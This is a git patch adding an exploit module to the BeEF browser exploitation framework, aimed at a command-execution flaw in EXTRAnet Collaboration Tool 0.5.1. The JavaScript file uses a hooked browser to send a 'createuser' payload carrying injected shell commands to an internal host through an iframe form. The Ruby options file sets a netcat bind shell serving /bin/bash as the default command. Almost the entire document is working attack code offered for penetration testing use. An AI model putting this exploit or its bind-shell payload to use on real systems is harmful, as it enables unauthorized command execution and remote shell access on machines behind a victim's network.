From 0dfab0e3480a7e0b514a2b35cf9c623b8bdafd74 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 16:40:02 +0930
Subject: [PATCH] Add EXTRAnet Collaboration Tool Command Execution exploit
 module

---
 modules/exploits/extract_cmd_exec/command.js  | 43 +++++++++++++++++++
 modules/exploits/extract_cmd_exec/config.yaml | 16 +++++++
 modules/exploits/extract_cmd_exec/module.rb   | 30 +++++++++++++
 3 files changed, 89 insertions(+)
 create mode 100644 modules/exploits/extract_cmd_exec/command.js
 create mode 100644 modules/exploits/extract_cmd_exec/config.yaml
 create mode 100644 modules/exploits/extract_cmd_exec/module.rb

diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(extract_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        extract_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+            description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '10100'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end